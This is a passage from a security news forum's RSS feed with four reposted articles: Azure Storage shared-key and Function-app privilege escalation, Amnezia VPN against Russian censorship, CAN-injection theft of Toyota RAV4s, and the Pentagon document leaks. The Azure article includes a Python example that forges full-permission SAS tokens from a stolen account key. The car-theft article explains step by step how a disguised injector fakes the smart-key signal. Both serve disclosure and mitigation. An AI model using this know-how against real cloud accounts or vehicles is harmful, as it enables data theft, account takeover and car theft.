	"It is possible to abuse and leverage Microsoft Storage Accounts by manipulating Azure Functions to steal access-tokens of higher privilege identities, move laterally, potentially access critical business assets, and execute remote code (RCE)," Orca said in a new report shared with The Hacker News.
</p>

<p>
	 
</p>

<p>
	The exploitation path that underpins this attack is a mechanism called Shared Key authorization, which is enabled by default on storage accounts.
</p>

<p>
	 
</p>

<p>
	According to Microsoft, Azure generates two 512-bit storage account access keys when creating a storage account. These keys can be used to authorize access to data via Shared Key authorization, or via SAS tokens that are signed with the shared key.
</p>

<p>
	 
</p>

<p>
	"Storage account access keys provide full access to the configuration of a storage account, as well as the data," Microsoft notes in its documentation. "Access to the shared key grants a user full access to a storage account's configuration and its data."
</p>
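<p>
	To make the "full access" claim concrete, the Python below is an added example (not Microsoft's or Orca's code) that implements the documented account-SAS signature: HMAC-SHA256 over the string-to-sign, keyed with the base64-decoded account key. Whoever holds the key can mint a token for any permission set and any expiry, and the only revocation is rotating the key. The account name and keys are fake, and the string-to-sign layout is the service-version 2019-12-12 format (no encryption-scope field); check Microsoft's reference before reusing it outside this demonstration.
</p>

```python
"""What a stolen storage account key lets you do: mint SAS tokens at will.

Added example, not Microsoft's or Orca's code. It implements the documented
Azure account-SAS signature (HMAC-SHA256 over the string-to-sign, keyed
with the base64-decoded account key) to make the point concrete: anyone
holding the key can issue tokens for any permission and any expiry, and
the only way to revoke them is to rotate the key. The account name and
keys are fake; the string-to-sign layout is the service-version 2019-12-12
format, which predates the encryption-scope field.
"""
import base64
import hashlib
import hmac
import os
from urllib.parse import parse_qs, urlencode

SAS_VERSION = "2019-12-12"


def sign(account_key_b64, string_to_sign):
    key = base64.b64decode(account_key_b64)
    mac = hmac.new(key, string_to_sign.encode("utf-8"), hashlib.sha256).digest()
    return base64.b64encode(mac).decode("ascii")


def account_sas_string_to_sign(account, params):
    """Account SAS string-to-sign (pre-2020-12-06 layout: no encryption scope)."""
    return "\n".join([
        account,
        params["sp"],           # signed permissions
        params["ss"],           # signed services (b=blob, q=queue, t=table, f=file)
        params["srt"],          # signed resource types (s=service, c=container, o=object)
        params.get("st", ""),   # signed start (optional)
        params["se"],           # signed expiry
        params.get("sip", ""),  # signed IP range (optional)
        params.get("spr", ""),  # signed protocol (optional)
        params["sv"],           # signed version
    ]) + "\n"


def mint_account_sas(account, account_key_b64, permissions, expiry,
                     services="bqtf", resource_types="sco", protocol="https"):
    """Build the query string a holder of the key can hand to anyone."""
    params = {"sv": SAS_VERSION, "ss": services, "srt": resource_types,
              "sp": permissions, "se": expiry, "spr": protocol}
    params["sig"] = sign(account_key_b64, account_sas_string_to_sign(account, params))
    return urlencode(params)


def verify_account_sas(account, account_key_b64, query):
    """Service side: recompute the signature with the key the service currently holds."""
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    presented = params.pop("sig", "")
    expected = sign(account_key_b64, account_sas_string_to_sign(account, params))
    return hmac.compare_digest(presented, expected)


def new_account_key():
    """Fake key in the shape Azure generates: base64 of 64 random bytes (512 bits)."""
    return base64.b64encode(os.urandom(64)).decode("ascii")


ACCOUNT = "contosofuncstorage"   # made up
KEY_1 = new_account_key()        # the key the attacker exfiltrated
KEY_2 = new_account_key()        # the key after rotation

if __name__ == "__main__":
    # Full permissions, valid for a decade: nothing but key rotation stops this token.
    token = mint_account_sas(ACCOUNT, KEY_1, "rwdlacup", "2033-01-01T00:00:00Z")
    print("minted:", token)
    print("valid before rotation:", verify_account_sas(ACCOUNT, KEY_1, token))
    print("valid after rotation: ", verify_account_sas(ACCOUNT, KEY_2, token))
```

<p>
	This is why the mitigation is to disable Shared Key authorization outright rather than to guard the key harder: with Azure AD authorization there is no single long-lived secret whose theft grants everything, and the tokens that replace it are scoped to a role and short-lived.
</p>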

<p>
	 
</p>

<p>
	The cloud security firm said these access tokens can be stolen by manipulating Azure Functions, potentially enabling a threat actor who holds the Storage Account Contributor role to escalate privileges and take over systems.
</p>

<p>
	 
</p>

<p>
	Specifically, should a managed identity be used to invoke the Function app, it could be abused to execute any command. This, in turn, is made possible owing to the fact that a dedicated storage account is created when deploying an Azure Function app.
</p>

<p>
	 
</p>

<p>
	"Once an attacker locates the storage account of a Function app that is assigned with a strong managed identity, it can run code on its behalf and as a result acquire a subscription privilege escalation (PE)," Orca researcher Roi Nisimi said.
</p>

<p>
	 
</p>

<p>
	In other words, by exfiltrating the access-token of the Azure Function app's assigned managed identity to a remote server, a threat actor can elevate privileges, move laterally, access new resources, and execute a reverse shell on virtual machines.
</p>

<p>
	 
</p>

<p>
	"By overriding function files in storage accounts, an attacker can steal and exfiltrate a higher-privileged identity and use it to move laterally, exploit and compromise victims' most valuable crown jewels," Nisimi explained.
</p>

<p>
	 
</p>

<p>
	As mitigations, it's recommended that organizations consider disabling Azure Shared Key authorization and using Azure Active Directory authentication instead. In a coordinated disclosure, Microsoft said it "plans to update how Functions client tools work with storage accounts."
</p>

<p>
	 
</p>

<p>
	"This includes changes to better support scenarios using identity. After identity-based connections for AzureWebJobsStorage are generally available and the new experiences are validated, identity will become the default mode for AzureWebJobsStorage, which is intended to move away from shared key authorization," the tech giant further added.
</p>

<p>
	 
</p>

<p>
	The findings arrive weeks after Microsoft patched a misconfiguration issue impacting Azure Active Directory that made it possible to tamper with Bing search results and a reflected XSS vulnerability in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2023/04/newly-discovered-by-design-flaw-in.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14429</guid><pubDate>Tue, 11 Apr 2023 13:52:48 +0000</pubDate></item><item><title>The Open Source VPN Out-Maneuvering Russian Censorship</title><link>https://nsaneforums.com/news/security-privacy-news/the-open-source-vpn-out-maneuvering-russian-censorship-r14394/</link><description><![CDATA[<p>
	<strong><span style="font-size:14px;">Amnezia, a free virtual private network, allows users to set up their own servers, making it harder for Moscow to block this portal to the outside world.</span></strong>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">THE RUSSIAN GOVERNMENT has <a href="https://www.wired.com/story/russia-internet-censorship-splinternet/" rel="external nofollow">banned</a> more than <a href="https://roskomsvoboda.org/post/10000-military-cens/" rel="external nofollow">10,000 websites</a> for content about the war in Ukraine since Moscow launched the full-scale invasion in February 2022. The blacklist <a href="https://www.wired.com/story/russia-ukraine-social-media/" rel="external nofollow">includes</a> Facebook, Twitter, Instagram, and independent news outlets.</span>
</p>

<p>
	<span style="font-size:14px;">Over the past year, Russians living inside the country have turned to censorship circumvention tools such as <a href="https://www.wired.com/story/best-vpn/" rel="external nofollow">VPNs</a> to pierce through the information blockade.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">But as dozens of virtual private networks get blocked, leaving users scrambling to maintain their access to free information, local activists and developers are coming up with new solutions. One of them is Amnezia VPN, a free, open source VPN client.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“We even do not advertise and promote it, and new users are still coming by the hundreds every day,” says Mazay Banzaev, Amnezia VPN’s founder.</span>
</p>

<p>
	<span style="font-size:14px;">Unlike commercial VPNs that route users through company servers, which can be blocked, Amnezia VPN makes it simple for users to buy and set up their own servers. This allows them to choose their own IP address and use protocols that are harder to block.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“More than half of the commercial VPNs in Russia have been blocked because it’s easy enough to block them: They do not block them by protocols, but by IP addresses,” says Banzaev. “[Amnezia] is an order of magnitude more resilient than a typical commercial VPN.”</span>
</p>

<p>
	<span style="font-size:14px;">Amnezia VPN is similar to Outline, a free and open source tool developed by Jigsaw, a subsidiary of Google. Amnezia was created in 2020 during a hackathon supported by Russian digital rights organization Roskomsvoboda. Even then, “it was clear that things were moving toward stricter censorship,” says Banzaev.</span>
</p>

<p>
	<span style="font-size:14px;">Russian authorities have been attempting to control tools such as VPNs and anonymous proxy servers for years, including by <a href="https://www.bbc.com/news/technology-41829726" rel="external nofollow">introducing</a> a law regulating these tools in 2017. Since Russia's invasion of Ukraine, however, the Kremlin has escalated its efforts to control information. </span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Just days after Russian troops headed toward Kyiv, Ukraine’s capital, Vladimir Putin signed legislation that criminalizes spreading "fake" information about the war, with a penalty of up to 15 years in prison. Most independent news outlets are now blocked, with editors and journalists ending up in prison, leaving Russians with state propaganda.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This has made VPNs and other censorship circumvention tools all the more important, says Stanislav Shakirov, cofounder of Roskomsvoboda and founder of tech development organization Privacy Accelerator. “If internet users in Russia stop receiving information other than state information,” he says, “we will have no hope of any processes leading to a change in the current regime.”</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The Kremlin is, of course, not giving up on its crackdown. In September 2022, Roskomnadzor, the main government body responsible for internet censorship, <a href="https://rkn.gov.ru/news/rsoc/news73836.htm" rel="external nofollow">announced</a> it would block six popular VPN services, including ExpressVPN and NordVPN. This was followed in March 2023 by <a href="https://www.pravda.ru/news/society/1810817-vpn_servisy/" rel="external nofollow">announcements</a> that VPNs refusing to provide data to domestic intelligence agencies would be blocked in Russia, as well as <a href="https://www.kommersant.ru/doc/5899231" rel="external nofollow">proposals</a> to restrict anonymization tools such as virtual phone numbers. Messaging app Telegram, which saw a <a href="https://www.reuters.com/technology/telegram-surpasses-whatsapp-become-russias-top-messenger-megafon-2022-03-21/" rel="external nofollow">steep rise in popularity</a> in Russia after the invasion, has been <a href="https://www.theverge.com/2022/12/7/23498236/telegram-fragment-phone-number-crypto-verification-monetization" rel="external nofollow">offering virtual phone numbers</a> since December 2022.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Although anti-censorship services like Lantern, Psiphon, and <a href="https://www.wired.co.uk/article/tor-browser-russia-blocks" rel="external nofollow">Tor are still working in Russia</a>, albeit with some interruptions, authorities have largely been successful in their fight against VPNs, Shakirov says. “The fate of such mass public VPNs in Russia now does not look bright with the current technology stack,” he says.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This has made services such as Amnezia even more popular. It is unclear how many users the service has, since the organization doesn’t have a way to monitor user numbers, Banzaev says. However, Amnezia offers a Telegram bot called AmneziaFree, which shares VPN configurations that help users access blocked platforms and news; it has almost 100,000 users. The bot is currently struggling with overload, and users are complaining about spotty service. Banzaev says the Amnezia team is working to add new servers on a limited budget, and that they are also working on a new version of the service.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Amnezia is not only used in Russia. The service has spread to Turkmenistan, Iran, China, and other countries where users have been struggling with free access to the web.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.wired.com/story/amnezia-vpn-russia-censorship/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">14394</guid><pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate></item><item><title>There&#x2019;s a new form of keyless car theft that works in under 2 minutes</title><link>https://nsaneforums.com/news/security-privacy-news/there%E2%80%99s-a-new-form-of-keyless-car-theft-that-works-in-under-2-minutes-r14375/</link><description><![CDATA[<h3>
	As car owners grow hip to one form of theft, crooks are turning to new ones.
</h3>

<p>
	 
</p>

<div itemprop="articleBody">
	
	<p>
		When a London man discovered the front left-side bumper of his Toyota RAV4 torn off and the headlight partially dismantled not once but twice in three months last year, he suspected the acts were senseless vandalism. When the vehicle went missing a few days after the second incident, and a neighbor found their Toyota Land Cruiser gone shortly afterward, he discovered they were part of a new and sophisticated technique for performing keyless thefts.
	</p>

	<p>
		 
	</p>

	<p>
		It just so happened that the owner, Ian Tabor, is a cybersecurity researcher specializing in automobiles. While investigating how his RAV4 was taken, he stumbled on a new technique called CAN injection attacks.
	</p>

	<h2>
		The case of the malfunctioning CAN
	</h2>

	<p>
		Tabor began by poring over the “MyT” telematics system that Toyota uses to track vehicle anomalies known as DTCs (Diagnostic Trouble Codes). It turned out his vehicle had recorded many DTCs around the time of the theft.
	</p>

	<p>
		 
	</p>

	<p>
		The error codes showed that communication had been lost between the RAV4’s CAN—short for <a href="https://en.wikipedia.org/wiki/CAN_bus" rel="external nofollow">Controller Area Network</a>—and the headlight’s Electronic Control Unit. These ECUs, as they’re abbreviated, are found in virtually all modern vehicles and are used to control a myriad of functions, including wipers, brakes, individual lights, and engine. Besides controlling the components, ECUs send status messages over the CAN to keep other ECUs apprised of current conditions.
	</p>

	<p>
		 
	</p>

	<p>
		This diagram maps out the CAN topology for the RAV4:
	</p>

	<p>
		 
	</p>

	<figure>
		<img alt="rav4-ecu-diagram.png" class="ipsImage" data-ratio="75.10" height="327" width="720" src="https://cdn.arstechnica.net/wp-content/uploads/2023/04/rav4-ecu-diagram.png">
		<figcaption>
			<div>
				<em>Diagram showing the CAN topology of the RAV4.</em>
			</div>

			<div>
				<em>Ken Tindell</em>
			</div>
		</figcaption>
	</figure>

	<p>
		The DTCs showing that the RAV4’s left headlight lost contact with the CAN weren’t particularly surprising, considering that the crooks had torn off the cables that connected it. More telling was the failure at the same time of many other ECUs, including those for the front cameras and the hybrid engine control. Taken together, these failures suggested not that the ECUs had failed but rather that the CAN bus had malfunctioned. That sent Tabor searching for an explanation.
	</p>

	<p>
		 
	</p>

	<p>
		The researcher and theft victim next turned to crime forums on the dark web and YouTube videos discussing how to steal cars. He eventually found ads for what were labeled “emergency start” devices. Ostensibly, these devices were designed for owners or locksmiths to use when no key is available, but nothing was preventing their use by anyone else, including thieves. Tabor bought a device advertised for starting various vehicles from Lexus and Toyota, including the RAV4. He then proceeded to reverse engineer it and, with help from friend and fellow automotive security expert Ken Tindell, figure out how it worked on the CAN of the RAV4.
	</p>

	<h2>
		Inside this JBL speaker lies a new form of attack
	</h2>
	<p>
		The research uncovered a form of keyless vehicle theft neither researcher had seen before. In the past, thieves found success using what’s known as a <a href="https://arstechnica.com/cars/2015/04/new-york-times-columnist-falls-prey-to-signal-repeater-car-burglary/" rel="external nofollow">relay attack</a>. These hacks amplify the signal between the car and the keyless entry fob used to unlock and start it. Keyless fobs typically only communicate over distances of a few feet. By placing a simple handheld radio device near the vehicle, thieves amplify the normally faint message that cars send. With enough amplification, the messages reach the nearby home or office where the key fob is located. When the fob responds with the cryptographic message that unlocks and starts the vehicle, the crook's repeater relays it to the car. With that, the crook drives off.
	</p>

	<p>
		 
	</p>

	<p>
		“Now that people know how a relay attack works … car owners keep their keys in a metal box (blocking the radio message from the car) and some car makers now supply keys that go to sleep if motionless for a few minutes (and so won’t receive the radio message from the car),” Tindell wrote in a recent <a href="https://kentindell.github.io/2023/04/03/can-injection/" rel="external nofollow">post</a>. “Faced with this defeat but being unwilling to give up a lucrative activity, thieves moved to a new way around the security: bypassing the entire smart key system. They do this with a new attack: CAN Injection.”
	</p>

	<p>
		 
	</p>
</div>

<nav>
	<div itemprop="articleBody">
		<p>
			Tindell linked to <a href="https://www.youtube.com/watch?v=bP7kNy5KBnA" rel="external nofollow">this video</a>, which he says captures a CAN-injection theft in action.
		</p>

		<figure>
			<figcaption>
				<div>
					<div class="ipsEmbeddedVideo" contenteditable="false">
						<div>
							<iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="113" src="https://www.youtube-nocookie.com/embed/bP7kNy5KBnA?feature=oembed" title="Toyota RAV4 2021 - stolen in less than two minutes" width="200"></iframe>
						</div>
					</div>
					<em>Toyota RAV4 2021—stolen in less than two minutes.</em>
				</div>
			</figcaption>
		</figure>

		<p>
			The CAN-injector Tabor bought was disguised as a Bluetooth JBL speaker. That gives thieves cover in the event police or others become suspicious. Instead of carrying an obvious hacking device, the crook appears to possess an innocuous speaker.
		</p>

		<figure>
			<img alt="disguised-injector-device-scaled.jpg" class="ipsImage" data-ratio="75.10" height="540" width="405" src="https://cdn.arstechnica.net/wp-content/uploads/2023/04/disguised-injector-device-scaled.jpg">
			<figcaption>
				<div>
					<em>The CAN injector disguised as a JBL speaker.</em>
				</div>
			</figcaption>
		</figure>

		<p>
			A closer analysis revealed that there was much more to it. More specifically, there were CAN injector chips grafted to the circuit board.
		</p>

		<figure>
			<img alt="injector-chip-grafted-on-circuit-board-s" class="ipsImage" data-ratio="75.10" height="540" width="374" src="https://cdn.arstechnica.net/wp-content/uploads/2023/04/injector-chip-grafted-on-circuit-board-scaled.jpg">
			<figcaption>
				<div>
					<em>CAN Injector chips enclosed in a glob of resin grafted onto the JBL circuit board.</em>
				</div>

				<div>
					<em>Ken Tindell</em>
				</div>
			</figcaption>
		</figure>

		<p>
			Tindell explained:
		</p>

		<blockquote>
			<p>
				It turns out it’s about $10 of components: a PIC18F chip that contains CAN hardware, plus software pre-programmed into the chip (known as firmware), a CAN transceiver (a standard CAN chip that turns digital signals from the CAN hardware on the PIC18F into the analog voltages sent on CAN wires), and an extra circuit connected to the CAN transceiver (more on this shortly). The device takes its power from the speaker battery, and connects to a CAN bus. A CAN bus is basically a pair of wires twisted together, and in a car there are several CAN buses joined together, either directly with connectors, or wired digitally via a gateway computer that copies some CAN messages back and forth between the CAN buses it is connected to.
			</p>

			<p>
				 
			</p>

			<p>
				The theft device is designed to be connected to the control CAN bus (the red bus in the wiring diagram) to impersonate the smart key ECU. There are several ways to get to the wires for this CAN bus, the only requirement being that the wires need to come to the edge of the car so that they can be reached (wires buried deep in the car are impractical to reach by thieves trying to steal a parked car on the street). By far the easiest route in to that CAN bus on the RAV4 is through the headlights: pulling the bumper away and accessing the CAN bus from the headlight connector. Other access would be possible: even punching a hole in a panel where the twisted pair of CAN wires goes past, cutting the two wires, and splicing in the CAN Injector would also work, but the diminished value of a car with a hole in it means thieves take the easiest route (Ian’s sleuthing found that mostly these cars are destined for export, sent via shipping container to places in Africa).
			</p>

			<p>
				 
			</p>

			<p>
				When first powered on, the CAN Injector does nothing: it’s listening for a particular CAN message to know that the car is ready. When it receives this CAN message it does two things: it starts sending a burst of CAN messages (at about 20 times per second) and it activates that extra circuit connected to its CAN transceiver. The burst of CAN messages contains a ‘smart key is valid’ signal, and the gateway will relay this to the engine management ECU on the other bus. Normally, this would cause confusion on the control CAN bus: CAN messages from the real smart key controller would clash with the imposter messages from the CAN Injector, and this could prevent the gateway from forwarding the injected message. This is where that extra circuit comes in: it changes the way a CAN bus operates so that other ECUs on that bus cannot talk. The gateway can still listen to messages, and can of course still send messages on to the powertrain CAN bus. The burst repeats 20 times a second because the setup is fragile, and sometimes the gateway is not listening because its CAN hardware is resetting itself (because it thinks that being unable to talk is an indication of a fault - which in a way it is).
			</p>

			<p>
				 
			</p>

			<p>
				There is a ‘Play’ button on the JBL Bluetooth speaker case, and this is wired into the PIC18F chip. When this button is pressed, the burst of CAN messages changes slightly and they instruct the door ECU to unlock the doors (as if the ‘unlock’ button on the wireless key had been pressed). The thieves can then unhook the CAN Injector, get into the car, and drive it away.
			</p>
		</blockquote>

		<p>
			Tabor and Tindell have designed two defenses they say would defeat CAN injection attacks. Tindell said they notified Toyota of the defenses but have yet to receive a response.
		</p>
	</div>

	<p>
		 
	</p>
</nav>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/information-technology/2023/04/crooks-are-stealing-cars-using-previously-unknown-keyless-can-injection-attacks/" rel="external nofollow">There’s a new form of keyless car theft that works in under 2 minutes</a>
</p>
]]></description><guid isPermaLink="false">14375</guid><pubDate>Sat, 08 Apr 2023 21:01:50 +0000</pubDate></item><item><title>Polling the Internet: Disinformation or Not?</title><link>https://nsaneforums.com/news/security-privacy-news/polling-the-internet-disinformation-or-not-r14372/</link><description><![CDATA[<p>
	<span style="font-size:22px;"><strong>Pentagon and NATO war plans are said to have leaked online yesterday. More followed today. But are they legit or is someone messing with us?</strong></span>
</p>

<p>
	 
</p>

<p>
	This week, the New York Times reported that a tranche of classified material had leaked to the web. The documents, which were purported to involve the Pentagon and NATO’s military stratagems to assist the Ukrainians in their war with the Russians, were found on Twitter and the chat app Telegram.
</p>

<p>
	 
</p>

<p>
	On Thursday, the Defense Department told the Gray Lady that it’s in the process of investigating how the apparently secret plans had ended up splashed across newsfeeds.
</p>

<p>
	 
</p>

<p>
	Before the Pentagon could clear that up, however, more documents leaked online. The Times reported Friday that “a new batch of classified documents” had spilled onto social media platforms. This time, the documents initially popped up on 4chan, the right-wing cesspool where digital diseases like QAnon have been known to fester. The new docs appear to cover a broader range of secretive material than the previous ones—allegedly detailing a host of “national security secrets” that involve not only the U.S.’s activities in Ukraine but also the Middle East and China.
</p>

<p>
	 
</p>

<p>
	Something like this hasn’t happened in quite a long time. Julian Assange is behind bars and Edward Snowden is busy writing a Substack, so there aren’t a ton of digital whistleblowers out there to flush the government’s secret docs into public view. But as officials scramble to figure out what’s going on, a question has quickly emerged: are the documents in these leaks even legitimate?
</p>

<p>
	 
</p>

<p>
	Indeed, suspicions are swirling that the docs are not what they seem—and the Times is also reporting that both sides of the Russo-Ukrainian war have been referring to it as a potential disinformation effort. But if that’s the case, then whose disinformation is it? And what are they trying to disinform us about?
</p>

<p>
	 
</p>

<p>
	Weirdly, the Pentagon has acknowledged that the documents “are legitimate Defense Department documents, but the copies appear to have been altered in certain parts from their original format,” the Times writes. These edited versions, according to DoD officials, “overstate American estimates of Ukrainian war dead and underestimate estimates of Russian troops killed.”
</p>

<p>
	 
</p>

<p>
	Ukrainians don’t seem totally convinced of the veracity of the documents, with the Times quoting a “senior Ukrainian official” who thought the leak was a “Russian ploy to discredit a counteroffensive.”
</p>

<p>
	 
</p>

<p>
	But Russian media, too, would appear to be suspect. On RT.com, one of the nation’s most popular news outlets, an op-ed entitled “Here’s why the leaked ‘secret plan’ for a Ukrainian military offensive doesn’t add up” calls the docs “misinformation” and argues that the documents were “probably prepared and distributed” by “pro-Kiev analysts.” The Times also reports that “pro-war Russian bloggers” had suggested that the leak was part of a “disinformation effort” and a researcher that the Times talked to who studies Russian messaging said that “pro-Kremlin voices were saying the leak was an American or Ukrainian disinformation campaign.”
</p>

<p>
	 
</p>

<p>
	So, make of that what you will. From here, things look about as clear as mud.
</p>

<p>
	 
</p>

<p>
	The Justice Department told the Times that it’s opened an investigation into the leaks but has declined to comment further. I don’t think I’m going to hold my breath for any forthcoming results from that investigation but I am pretty damn curious to see what happens next in this little saga.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://gizmodo.com/ukraine-china-middle-east-pentagon-classified-leaks-1850313624" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14372</guid><pubDate>Sat, 08 Apr 2023 17:19:01 +0000</pubDate></item></channel></rss>
